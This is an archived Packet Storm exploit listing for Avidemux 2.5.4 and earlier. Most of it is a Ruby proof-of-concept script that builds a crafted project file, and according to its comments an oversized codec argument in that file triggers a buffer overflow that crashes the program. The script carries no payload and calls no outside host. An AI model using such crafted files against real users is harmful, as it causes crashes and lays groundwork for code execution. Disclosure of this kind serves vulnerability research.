Avidemux 2.5.4 Buffer Overflow

2010-11-08T00:00:00
ID PACKETSTORM:95576
Type packetstorm
Reporter The_UnKnown
Modified 2010-11-08T00:00:00

Description

                                        
                                            `#!/usr/bin/env ruby  
# avidemux_crash.rb  
#  
# Title : Avidemux <= 2.5.4 Buffer Overflow PoC  
# Date : 31.10.2010  
# Version : <= 2.5.4  
# Software Link : http://avidemux.sourceforge.net/download.html / http://avidemux.razorbyte.com.au/  
# Author : The_UnKn@wn  
# Email : the_unknown [at] group51 [dot] org  
# Homepage : http://group51.org  
# Tested on : openSUSE 11.3 and Windows XP SP3 English  
#  
# Usage:  
# ruby avidemux_crash.rb <a *.mpg file>  
# Start Avidemux --> Load/Run Project --> crash!!  
#  
# Note:  
# You can also use another video file format you would have to change the Format in Line and maybe some other stuff #54 too  
#  
  
file = ARGV[0]  
  
if file.nil?  
puts "Usage: ruby #{__FILE__} <path to sample video .mpg file>"  
exit  
end  
name = "avidemux.prj"  
  
text = "//AD <- Needed to identify//\n" +  
"//--automatically built--\n"+  
"var app = new Avidemux();\n"+  
"//** Video **\n"+  
"// 01 videos source \n"+  
"app.load(\"#{file}\");\n"+  
"//01 segments:\n"+  
"app.clearSegments();\n"+  
"app.addSegment(0,0,157699);\n"+  
"app.markerA=0;\n"+  
"app.markerB=77543;\n"+  
"app.rebuildIndex();\n"+  
"//** Postproc **\n"+  
"app.video.setPostProc(3,3,0);\n"+  
"app.video.fps1000 = 25000;\n"+  
"//** Filters **\n"+  
"//** Video Codec conf **\n"+  
"app.video.codec(\"Copy\", \"CQ=4\", \"200 \"); \n"+ # <-- here is the vuln app.video.codec("Copy","CQ=4","0 ");  
"//** Audio **\n"+  
"app.audio.reset();\n"+  
"app.audio.codec(\"copy\",-1078515528,0,\"\");\n"+  
"app.audio.normalizeMode=0;\n"+  
"app.audio.normalizeValue=0;\n"+  
"app.audio.delay=0;\n"+  
"app.audio.mixer=\"NONE\";\n"+  
"app.setContainer(\"AVI\");\n"+  
"setSuccess(1);\n"+  
"//app.Exit();\n"+  
"//End of script"  
  
File.open(name, "w") do |f|  
f.puts(text)  
end  
  
puts "File #{name} has been created successfully"  
  
`